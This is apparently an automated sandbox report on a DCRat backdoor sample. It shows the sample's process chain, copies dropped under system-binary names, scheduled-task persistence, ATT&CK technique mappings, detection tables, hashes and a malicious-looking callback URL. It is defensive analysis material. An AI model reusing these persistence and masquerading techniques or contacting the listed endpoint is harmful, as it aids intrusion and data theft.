            Source: C:\Users\user\Desktop\hx1hwVZIjy.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ReviewHost\LGlGhCGbVntC7HCLV0QyeYWp.vbe"
            Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ReviewHost\Qtt5UtOWbMYxPmztsNxVxiRIZauHb.bat" "
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\ReviewHost\brokercrt.exe "C:\ReviewHost\brokercrt.exe"
            Source: C:\ReviewHost\brokercrt.exe Process created: unknown unknown
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exe Code function: 0_2_00F4ED5B cpuid 0_2_00F4ED5B
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exe Code function: GetLocaleInfoW,GetNumberFormatW,0_2_00F4A63C
            Source: C:\ReviewHost\brokercrt.exe Queries volume information: C:\ReviewHost\brokercrt.exe VolumeInformation
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exe Queries volume information: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exe VolumeInformation
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exe Queries volume information: C:\Users\Public\Videos\AFKwztugVSPq.exe VolumeInformation
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exe Code function: 0_2_00F4D5D4 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_00F4D5D4
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exe Code function: 0_2_00F3ACF5 GetVersionExW,0_2_00F3ACF5
            Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match. File source: 00000023.00000002.2214435641.0000000002531000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match. File source: 00000023.00000002.2214435641.0000000002527000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match. File source: 00000005.00000002.2112725978.0000000003397000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match. File source: 00000023.00000002.2214435641.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match. File source: 00000025.00000002.2214490270.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match. File source: 00000005.00000002.2112725978.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match. File source: Process Memory Space: brokercrt.exe PID: 2464, type: MEMORYSTR
            Source: Yara match. File source: Process Memory Space: AFKwztugVSPq.exe PID: 2828, type: MEMORYSTR
            Source: Yara match. File source: Process Memory Space: AFKwztugVSPq.exe PID: 7084, type: MEMORYSTR

            Remote Access Functionality

            Source: Yara match. File source: 00000023.00000002.2214435641.0000000002531000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match. File source: 00000023.00000002.2214435641.0000000002527000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match. File source: 00000005.00000002.2112725978.0000000003397000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match. File source: 00000023.00000002.2214435641.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match. File source: 00000025.00000002.2214490270.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match. File source: 00000005.00000002.2112725978.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match. File source: Process Memory Space: brokercrt.exe PID: 2464, type: MEMORYSTR
            Source: Yara match. File source: Process Memory Space: AFKwztugVSPq.exe PID: 2828, type: MEMORYSTR
            Source: Yara match. File source: Process Memory Space: AFKwztugVSPq.exe PID: 7084, type: MEMORYSTR
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information11
            Scripting
            Valid Accounts111
            Windows Management Instrumentation
            1
            Scheduled Task/Job
            11
            Process Injection
            232
            Masquerading
            OS Credential Dumping1
            System Time Discovery
            Remote Services11
            Archive Collected Data
            1
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts2
            Command and Scripting Interpreter
            11
            Scripting
            1
            Scheduled Task/Job
            1
            Disable or Modify Tools
            LSASS Memory121
            Security Software Discovery
            Remote Desktop ProtocolData from Removable Media1
            Application Layer Protocol
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            Scheduled Task/Job
            1
            Registry Run Keys / Startup Folder
            1
            Registry Run Keys / Startup Folder
            31
            Virtualization/Sandbox Evasion
            Security Account Manager1
            Process Discovery
            SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCron1
            DLL Side-Loading
            1
            DLL Side-Loading
            11
            Process Injection
            NTDS31
            Virtualization/Sandbox Evasion
            Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Deobfuscate/Decode Files or Information
            LSA Secrets1
            Application Window Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
            Obfuscated Files or Information
            Cached Domain Credentials3
            File and Directory Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
            Software Packing
            DCSync47
            System Information Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            [Behavior graph. ID: 1428549; Sample: hx1hwVZIjy.exe; Start date: 19/04/2024; Architecture: WINDOWS; Score: 100. Process chain: hx1hwVZIjy.exe -> wscript.exe -> cmd.exe -> brokercrt.exe -> schtasks.exe and 30 other processes.]

            Source | Detection | Scanner | Label
            hx1hwVZIjy.exe | 61% | Virustotal | -
            hx1hwVZIjy.exe | 74% | ReversingLabs | ByteCode-MSIL.Trojan.Uztuby
            hx1hwVZIjy.exe | 100% | Avira | VBS/Runner.VPG
            hx1hwVZIjy.exe | 100% | Joe Sandbox ML | -

            Source | Detection | Scanner | Label
            C:\ReviewHost\LGlGhCGbVntC7HCLV0QyeYWp.vbe | 100% | Avira | VBS/Runner.VPG
            C:\Windows\Containers\serviced\wininit.exe | 100% | Avira | HEUR/AGEN.1323984
            C:\ReviewHost\brokercrt.exe | 100% | Avira | HEUR/AGEN.1323984
            C:\Recovery\smss.exe | 100% | Avira | HEUR/AGEN.1323984
            C:\Users\user\AppData\Local\Temp\bWPufSNCBJ.bat | 100% | Avira | BAT/Delbat.C
            C:\ReviewHost\conhost.exe | 100% | Avira | HEUR/AGEN.1323984
            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\cscript.exe | 100% | Avira | HEUR/AGEN.1323984
            C:\Program Files (x86)\Google\Update\AFKwztugVSPq.exe | 100% | Avira | HEUR/AGEN.1323984
            C:\Users\Default\WinStore.App.exe | 100% | Avira | HEUR/AGEN.1323984
            C:\ReviewHost\RuntimeBroker.exe | 100% | Avira | HEUR/AGEN.1323984
            C:\Windows\Containers\serviced\wininit.exe | 100% | Joe Sandbox ML | -
            C:\ReviewHost\brokercrt.exe | 100% | Joe Sandbox ML | -
            C:\Recovery\smss.exe | 100% | Joe Sandbox ML | -
            C:\ReviewHost\conhost.exe | 100% | Joe Sandbox ML | -
            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\cscript.exe | 100% | Joe Sandbox ML | -
            C:\Program Files (x86)\Google\Update\AFKwztugVSPq.exe | 100% | Joe Sandbox ML | -
            C:\Users\Default\WinStore.App.exe | 100% | Joe Sandbox ML | -
            C:\ReviewHost\RuntimeBroker.exe | 100% | Joe Sandbox ML | -
            C:\Program Files (x86)\Google\Update\AFKwztugVSPq.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
            C:\Program Files (x86)\Google\Update\AFKwztugVSPq.exe | 79% | Virustotal | -
            C:\Recovery\smss.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
            C:\Recovery\smss.exe | 79% | Virustotal | -
            C:\ReviewHost\AFKwztugVSPq.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
            C:\ReviewHost\AFKwztugVSPq.exe | 79% | Virustotal | -
            C:\ReviewHost\RuntimeBroker.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
            C:\ReviewHost\RuntimeBroker.exe | 79% | Virustotal | -
            C:\ReviewHost\brokercrt.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
            C:\ReviewHost\brokercrt.exe | 79% | Virustotal | -
            C:\ReviewHost\conhost.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
            C:\ReviewHost\conhost.exe | 79% | Virustotal | -
            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exe | 79% | Virustotal | -
            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\cscript.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\cscript.exe | 79% | Virustotal | -
            C:\Users\Default\WinStore.App.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
            C:\Users\Default\WinStore.App.exe | 79% | Virustotal | -
            C:\Users\Public\AFKwztugVSPq.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
            C:\Users\Public\AFKwztugVSPq.exe | 79% | Virustotal | -
            C:\Users\Public\Videos\AFKwztugVSPq.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
            C:\Users\Public\Videos\AFKwztugVSPq.exe | 79% | Virustotal | -
            C:\Users\user\AFKwztugVSPq.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
            C:\Users\user\AFKwztugVSPq.exe | 79% | Virustotal | -
            C:\Windows\Containers\serviced\wininit.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
            C:\Windows\Containers\serviced\wininit.exe | 79% | Virustotal | -
            No Antivirus matches
            No contacted domains info
            Name | Malicious | Antivirus Detection | Reputation
            http://a0945069.xsph.ru/@==gbJBzYuFDT | false | - | high

            Name | Source | Malicious | Antivirus Detection | Reputation
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | brokercrt.exe, 00000005.00000002.2112725978.00000000033BA000.00000004.00000800.00020000.00000000.sdmp | false | - | high
                No contacted IP infos
                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1428549
                Start date and time:2024-04-19 07:36:07 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 8m 11s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:43
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:hx1hwVZIjy.exe
                renamed because original name is a hash value
                Original Sample Name:48e5ef4a0ca234c29ceecab25fe23d91.exe
                Detection:MAL
                Classification:mal100.troj.evad.winEXE@45/31@0/0
                EGA Information:
                • Successful, ratio: 25%
                HCA Information:
                • Successful, ratio: 63%
                • Number of executed functions: 239
                • Number of non-executed functions: 92
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, conhost.exe
                • Excluded IPs from analysis (whitelisted): 13.85.23.86, 72.21.81.240, 52.165.164.15, 20.3.187.198
                • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, a0945069.xsph.ru, glb.sls.prod.dcat.dsp.trafficmanager.net
                • Execution Graph export aborted for target AFKwztugVSPq.exe, PID 2828 because it is empty
                • Execution Graph export aborted for target AFKwztugVSPq.exe, PID 7084 because it is empty
                • Execution Graph export aborted for target brokercrt.exe, PID 2464 because it is empty
                • Not all processes were analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                Time | Type | Description
                07:37:04 | Task Scheduler | Run new task: AFKwztugVSPq path: "C:\Users\Default User\Recent\AFKwztugVSPq.exe"
                07:37:04 | Task Scheduler | Run new task: AFKwztugVSPqA path: "C:\Users\Public\Videos\AFKwztugVSPq.exe"
                07:37:04 | Task Scheduler | Run new task: conhost path: "C:\ReviewHost\conhost.exe"
                07:37:04 | Task Scheduler | Run new task: conhostc path: "C:\ReviewHost\conhost.exe"
                07:37:04 | Task Scheduler | Run new task: smss path: "C:\Recovery\smss.exe"
                07:37:04 | Task Scheduler | Run new task: smsss path: "C:\Recovery\smss.exe"
                07:37:04 | Task Scheduler | Run new task: wininit path: "C:\Windows\Containers\serviced\wininit.exe"
                07:37:04 | Task Scheduler | Run new task: wininitw path: "C:\Windows\Containers\serviced\wininit.exe"
                07:37:04 | Task Scheduler | Run new task: WinStore.App path: "C:\Users\Default\WinStore.App.exe"
                07:37:04 | Task Scheduler | Run new task: WinStore.AppW path: "C:\Users\Default\WinStore.App.exe"
                07:37:07 | Task Scheduler | Run new task: cscript path: "C:\Users\Default User\Start Menu\Programs\System Tools\cscript.exe"
                07:37:07 | Task Scheduler | Run new task: cscriptc path: "C:\Users\Default User\Start Menu\Programs\System Tools\cscript.exe"
                07:37:07 | Task Scheduler | Run new task: RuntimeBroker path: "C:\ReviewHost\RuntimeBroker.exe"
                07:37:07 | Task Scheduler | Run new task: RuntimeBrokerR path: "C:\ReviewHost\RuntimeBroker.exe"
                No context
                Process:C:\ReviewHost\brokercrt.exe
                File Type:ASCII text, with very long lines (527), with no line terminators
                Category:dropped
                Size (bytes):527
                Entropy (8bit):5.862789133664586
                Encrypted:false
                SSDEEP:12:oAQ/hRE1KPCa93m+kB74P2DpWDnpziHEV7G5nu/qU9+UQjJK41ph3IHmapS9/:oA0hRqY3m+y7PDpUmEZG5noqM+UQjM4L
                MD5:21EAA92A13642729117F1F932317A710
                SHA1:94FF21CA37EC60D736A6005BAEBD5DF00AD44B49
                SHA-256:23C4BAE0CF80AD2E00F454EFC9DDF9C64A317E727B78279EECFBB2D41610314B
                SHA-512:FEF51FC1D1CD228AF16C9C78D777D6180D234D37BFB2DE3C8F416B7D66F95D29EED77339D29ED195F865A8EC8765B17EADF7A1E6F9DE76C1CFF040FA02A4E5D3
                Malicious:false
                Process:C:\ReviewHost\brokercrt.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):848384
                Entropy (8bit):6.078520776825986
                Encrypted:false
                SSDEEP:12288:W/mbBYJB7ioiXGQCo9yzsC4cYHi+z2Cp1ZpQAKjS6HZ:wmbqJB7ioiB9yzs9/Hi+i01ZxtYZ
                MD5:96B975481850ADD8CCB0353227ECEB87
                SHA1:F201465C8E9EEF2193C0023E5593F901D0C2A7F0
                SHA-256:0032FB8BB3E91A8063A769E8504814F02222448C01B61E3990B35316525057C9
                SHA-512:27A4100A0F3B8E859436859F2ED23207CE7D4236D42881B6D79B1591816864921A00D98693A60D6C9444DBEFD95C3833BC86EC0A20953F9D3B249EA7F527B6B4
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 88%
                • Antivirus: Virustotal, Detection: 79%, Browse
                Process:C:\ReviewHost\brokercrt.exe
                File Type:ASCII text, with very long lines (412), with no line terminators
                Category:dropped
                Size (bytes):412
                Entropy (8bit):5.8121864566032615
                Encrypted:false
                SSDEEP:6:vDq8g9p75Y1yivGP4Bin0CsT8baruv3sXibauUNzIOJ5FXvppFB/lPCI3h3K4:Ap75YsOi0Cy8bIwbauwzIm3v5Xh64
                MD5:A0E2570569B95E82F5E947DAFF659957
                SHA1:E21AF86431C3FF4ADCFF43FD3C7A0E240648771B
                SHA-256:FB60D0923148D48F19737AC5A9DAFE83C27D00CCA199C25F7EEB88EB42720ACE
                SHA-512:A6E7DDC11D3FD38160616B92021436824A8CBAB2D059291D031A050758408827AE54E080C7AADDC90E167CFC4571651D782754F33357477E45D01C150BC2ED4E
                Malicious:false
                Process:C:\ReviewHost\brokercrt.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):848384
                Entropy (8bit):6.078520776825986
                Encrypted:false
                SSDEEP:12288:W/mbBYJB7ioiXGQCo9yzsC4cYHi+z2Cp1ZpQAKjS6HZ:wmbqJB7ioiB9yzs9/Hi+i01ZxtYZ
                MD5:96B975481850ADD8CCB0353227ECEB87
                SHA1:F201465C8E9EEF2193C0023E5593F901D0C2A7F0
                SHA-256:0032FB8BB3E91A8063A769E8504814F02222448C01B61E3990B35316525057C9
                SHA-512:27A4100A0F3B8E859436859F2ED23207CE7D4236D42881B6D79B1591816864921A00D98693A60D6C9444DBEFD95C3833BC86EC0A20953F9D3B249EA7F527B6B4
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 88%
                • Antivirus: Virustotal, Detection: 79%, Browse
                Process:C:\ReviewHost\brokercrt.exe
                File Type:ASCII text, with very long lines (599), with no line terminators
                Category:dropped
                Size (bytes):599
                Entropy (8bit):5.873527358939234
                Encrypted:false
                SSDEEP:12:RMHKqVt8XzsJ5e0WpNXw247/AhaFu5fnRRZxonJVTvEdQhZT+7N/f3+7pq7nIJtB:RuVt8XAJM5Ng247kiu5PDZxUJVwKq7Nc
                MD5:01C224CA1A5F2FAF074A5D0D9B0B1D86
                SHA1:CE091E34F3E440CB3F494D89C04B2D07AFA154C2
                SHA-256:61961E3BD599BD766F7AB99568A007166156DFE4FE8AB4709098F0F73D83266D
                SHA-512:6964733B97AECC683374574B175AD8B3F8AE60D638305A913A15431BCAE8A8AEC486C466EA72054C9DFD318ACAB76BCD1B795B95AB3731B053F7078B653624A0
                Malicious:false
                Process:C:\ReviewHost\brokercrt.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):256
                Entropy (8bit):5.786494211060478
                Encrypted:false
                SSDEEP:6:S1VAvNdRZ+zDW2OMWz7i0hD8Wn4uopSWuMseZJ3d:S1VMdRZ+zS2Kz7145WSJ3d
                MD5:51904F985926252BF504A2EFA6CAF879
                SHA1:9A1B49C5FCC19FBC60B155FE9F8EC2F2468393DF
                SHA-256:1C83F8E1F384601DC06997E91C31F0C40124CAF9EFF4F498164F8745D48D631F
                SHA-512:51D9952045E780387282D40677BC5EEE3A2517A241672106D1148427FCA4FBE2570F13C835C61AD97C75599143D4301E54887C4297F6A01DFC712BD0483B02B3
                Malicious:false
                Process:C:\ReviewHost\brokercrt.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):105
                Entropy (8bit):5.52944906058128
                Encrypted:false
                SSDEEP:3:oGfeLIxpXz91a2hSBgRpkoofdnCVIMdachtVwXc1:hmgpXp1aG9pkNdnC+MdaOaXc1
                MD5:1C47F637C142B43DE69DAF41E9D1750E
                SHA1:B264EF9F893CB54D51EE1BCD26DCCB95683868C6
                SHA-256:DEF8323F1A822F9EF84188475024D13FF658BBFC7B9D6F0C71D88B4D6AF8B6D1
                SHA-512:22CA0AA1BAEC8C829F1046FB2DB2D2044B8D6A524DE804350DFBD15F7D9194C7B6BB622D43C4A8C6B5A593421669FF777362CE9CB5B818D802563303B09E5222
                Malicious:false
                Process:C:\ReviewHost\brokercrt.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):848384
                Entropy (8bit):6.078520776825986
                Encrypted:false
                SSDEEP:12288:W/mbBYJB7ioiXGQCo9yzsC4cYHi+z2Cp1ZpQAKjS6HZ:wmbqJB7ioiB9yzs9/Hi+i01ZxtYZ
                MD5:96B975481850ADD8CCB0353227ECEB87
                SHA1:F201465C8E9EEF2193C0023E5593F901D0C2A7F0
                SHA-256:0032FB8BB3E91A8063A769E8504814F02222448C01B61E3990B35316525057C9
                SHA-512:27A4100A0F3B8E859436859F2ED23207CE7D4236D42881B6D79B1591816864921A00D98693A60D6C9444DBEFD95C3833BC86EC0A20953F9D3B249EA7F527B6B4
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 88%
                • Antivirus: Virustotal, Detection: 79%, Browse
                Process:C:\Users\user\Desktop\hx1hwVZIjy.exe
                File Type:data
                Category:dropped
                Size (bytes):216
                Entropy (8bit):5.800344216163756
                Encrypted:false
                SSDEEP:6:GVwqK+NkLzWbHhE18nZNDd3RL1wQJRtgNlUNOsZpIs:G4MCzWLy14d3XBJwNOFis
                MD5:7B4906D1CB87DE73F115581DCAF9E232
                SHA1:0E02CAA3CE91FC59267606430158C7D3E112B700
                SHA-256:9C3B3E61CE002F1D33D5228DBBF535400F16646F1D83747251FF7849C5A32495
                SHA-512:5F6F967A49C329A6946BBE0C2D43AD4751D9A914DDF244C1055FB0678A1982F60401DBDBDE153B2027652E23EB83E2AC7D9BE77A897D5023435E3AEF65AABB96
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                Process:C:\Users\user\Desktop\hx1hwVZIjy.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):29
                Entropy (8bit):4.017824858003425
                Encrypted:false
                SSDEEP:3:I5wlS1dRLAE:IulgR0E
                MD5:17370288E4E03FAD288831AE1F887483
                SHA1:8AFDD43B5B01EE9517981E8E285113E2A08305F2
                SHA-256:AB7FE15930980A0B150427E5A7BDA9234292FA63E6358654EA2E356DDBCEAF66
                SHA-512:00E0253A0CA8AC0E8F44B716ED4357AC4790D2809172FDC5385607A888449E03F634444AC8E8689615A0AD7ED162F6B42EC4E0B2AECEA532C66575D047F22162
                Malicious:false
                Preview:"C:\ReviewHost\brokercrt.exe"
                Process:C:\ReviewHost\brokercrt.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):848384
                Entropy (8bit):6.078520776825986
                Encrypted:false
                SSDEEP:12288:W/mbBYJB7ioiXGQCo9yzsC4cYHi+z2Cp1ZpQAKjS6HZ:wmbqJB7ioiB9yzs9/Hi+i01ZxtYZ
                MD5:96B975481850ADD8CCB0353227ECEB87
                SHA1:F201465C8E9EEF2193C0023E5593F901D0C2A7F0
                SHA-256:0032FB8BB3E91A8063A769E8504814F02222448C01B61E3990B35316525057C9
                SHA-512:27A4100A0F3B8E859436859F2ED23207CE7D4236D42881B6D79B1591816864921A00D98693A60D6C9444DBEFD95C3833BC86EC0A20953F9D3B249EA7F527B6B4
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 88%
                • Antivirus: Virustotal, Detection: 79%, Browse
                Process:C:\Users\user\Desktop\hx1hwVZIjy.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):848384
                Entropy (8bit):6.078520776825986
                Encrypted:false
                SSDEEP:12288:W/mbBYJB7ioiXGQCo9yzsC4cYHi+z2Cp1ZpQAKjS6HZ:wmbqJB7ioiB9yzs9/Hi+i01ZxtYZ
                MD5:96B975481850ADD8CCB0353227ECEB87
                SHA1:F201465C8E9EEF2193C0023E5593F901D0C2A7F0
                SHA-256:0032FB8BB3E91A8063A769E8504814F02222448C01B61E3990B35316525057C9
                SHA-512:27A4100A0F3B8E859436859F2ED23207CE7D4236D42881B6D79B1591816864921A00D98693A60D6C9444DBEFD95C3833BC86EC0A20953F9D3B249EA7F527B6B4
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 88%
                • Antivirus: Virustotal, Detection: 79%, Browse
                Process:C:\ReviewHost\brokercrt.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):848384
                Entropy (8bit):6.078520776825986
                Encrypted:false
                SSDEEP:12288:W/mbBYJB7ioiXGQCo9yzsC4cYHi+z2Cp1ZpQAKjS6HZ:wmbqJB7ioiB9yzs9/Hi+i01ZxtYZ
                MD5:96B975481850ADD8CCB0353227ECEB87
                SHA1:F201465C8E9EEF2193C0023E5593F901D0C2A7F0
                SHA-256:0032FB8BB3E91A8063A769E8504814F02222448C01B61E3990B35316525057C9
                SHA-512:27A4100A0F3B8E859436859F2ED23207CE7D4236D42881B6D79B1591816864921A00D98693A60D6C9444DBEFD95C3833BC86EC0A20953F9D3B249EA7F527B6B4
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 88%
                • Antivirus: Virustotal, Detection: 79%, Browse
                Process:C:\ReviewHost\brokercrt.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):224
                Entropy (8bit):5.7262312803738915
                Encrypted:false
                SSDEEP:6:of/+MhYZNoYJQqSo4/EpBMkWcmBxNK3loYov7:C/+nZNoHq1yECX5Kopv7
                MD5:46B284915767596BDFF17E1D905BE065
                SHA1:0A1A64C39D2344DD8673E1F0AF4305BA740388CF
                SHA-256:569F08A448D8A5E00C8C1944273F275B5865798EB5D129F4AD4523C8E80F8A5A
                SHA-512:D7D831FB1DAAAB0DDFCD2A43B7C194392DEB2AA2527EE86D3EA842D2FE0E05DC0247041E985EA7FC51D9BCC6A8C63ABE0FF54C5063DC916D75CF0F02FF530AFD
                Malicious:false
                Process:C:\ReviewHost\brokercrt.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):848384
                Entropy (8bit):6.078520776825986
                Encrypted:false
                SSDEEP:12288:W/mbBYJB7ioiXGQCo9yzsC4cYHi+z2Cp1ZpQAKjS6HZ:wmbqJB7ioiB9yzs9/Hi+i01ZxtYZ
                MD5:96B975481850ADD8CCB0353227ECEB87
                SHA1:F201465C8E9EEF2193C0023E5593F901D0C2A7F0
                SHA-256:0032FB8BB3E91A8063A769E8504814F02222448C01B61E3990B35316525057C9
                SHA-512:27A4100A0F3B8E859436859F2ED23207CE7D4236D42881B6D79B1591816864921A00D98693A60D6C9444DBEFD95C3833BC86EC0A20953F9D3B249EA7F527B6B4
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 88%
                • Antivirus: Virustotal, Detection: 79%, Browse
                Process:C:\ReviewHost\brokercrt.exe
                File Type:ASCII text, with very long lines (984), with no line terminators
                Category:dropped
                Size (bytes):984
                Entropy (8bit):5.905747785877706
                Encrypted:false
                SSDEEP:24:cfAR8LFjo8ErMVrPmr15cIVxdibgKsHP+avlKP3Um/37ZCK:cU8LFJuSw1bxdWgBHPpdyEm/EK
                MD5:FABD7C31B3240FE5773BA62A145EF7CA
                SHA1:016A5F9F134C42F4D98D292ACE18982F67DA5F7F
                SHA-256:4EFA74CBCD64A79A35B908AEE8D20D3DFA4643AF0999A5AFE508F6D58AA73547
                SHA-512:2DB6137530A82B05B011C35A3506A3CCD749F25567F9A5F7C03E3D7DAE212EB82447AFA7E3068D00831F7E3B32EC4DE52A29BC1E1D4E130AD5C2826BB2168EB6
                Malicious:false
                Process:C:\ReviewHost\brokercrt.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):848384
                Entropy (8bit):6.078520776825986
                Encrypted:false
